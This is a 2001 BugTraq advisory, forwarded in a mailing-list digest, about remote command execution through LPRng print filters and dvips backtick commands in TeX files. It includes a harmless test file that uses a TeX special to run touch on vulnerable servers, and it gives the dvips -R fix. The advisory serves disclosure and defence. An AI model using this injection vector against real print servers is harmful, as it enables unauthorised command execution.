This is an RFC 1153 digest. (1 message) ---------------------------------------------------------------------- Return-Path: <[EMAIL PROTECTED]> Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm Precedence: bulk List-Id: <bugtraq.list-id.securityfocus.com> List-Post: <mailto:[EMAIL PROTECTED]> List-Help: <mailto:[EMAIL PROTECTED]> List-Unsubscribe: <mailto:[EMAIL PROTECTED]> List-Subscribe: <mailto:[EMAIL PROTECTED]> Delivered-To: mailing list [EMAIL PROTECTED] Delivered-To: moderator for [EMAIL PROTECTED] Received: (qmail 23233 invoked from network); 27 Aug 2001 15:26:23 -0000 X-X-Sender: <[EMAIL PROTECTED]> Message-ID: <[EMAIL PROTECTED]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: <[EMAIL PROTECTED]> From: zen-parse <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Subject: LPRng/rhs-printfilters - remote execution of commands Date: Tue, 28 Aug 2001 01:44:55 +1200 (NZST) (posted to vendor security ppl, no reply, no patch, so posting here.) --begin forwarded message-- RedHat 7.0 (possibly others) If the lpd is listening on 0.0.0.0 and no access controls are in place, it is possible to execute commands as the lp user, assuming tetex-dvips is installed. >From man dvips ... -R Run in secure mode. This means that ``backtick'' commands from a \special{} or \psffile{} macro in the (La)TeX source like \special{psfile="`zcat foo.ps.Z"} or \psffile[72 72 540 720]{"`zcat screendump.ps.gz"} are not executed. ... Unless the -R option is passed, the attached file will, when converted to a .dvi file (tex spool.tex), start a worm. A very primitive, proof of concept worm, with no payload, but it does stall the printer. (So don't run it without at least modifying it to do something else.) /usr/lib/rhs/rhs-printfilters/dvi-to-ps.fpi ... dvips -f $DVIPS_OPTIONS < $TMP_FILE ... change it to ... dvips -R -f $DVIPS_OPTIONS < $TMP_FILE ... and it should be a little safer. -- zen-parse --end forwarded message-- I deleted the worm file before posting this to BugTraq. It's 2 lines of bash, but not really the kind of thing that is helpful to post here. -rw-r--r-- 1 evil evil 152 Aug 16 16:37 spool.tex Instead, use this to test your machine. cat >proof-of-concept.tex <<EOF \special{psfile="`touch /tmp/lpowned"} \end EOF tex proof-of-concept lpr proof-of-concept.dvi -- zen-parse [ mp3.com/cosv - new music added this month ] [ ============ ] [ ========================== ] -- ------------------------------------------------------------------------- The preceding information, unless directly posted by [EMAIL PROTECTED] to an open forum is confidential information and not to be distributed (without explicit permission being given by [EMAIL PROTECTED]). Legal action may be taken to enforce this. If you are mum or dad, this probably doesn't apply to you. ------------------------------ End of this Digest ****************** -- Raju Mathur [EMAIL PROTECTED] http://kandalaya.org/ ------------------------------------------------ The mailing list archives are available at http://lists.linux-india.org/cgi-bin/wilma/linux-delhi
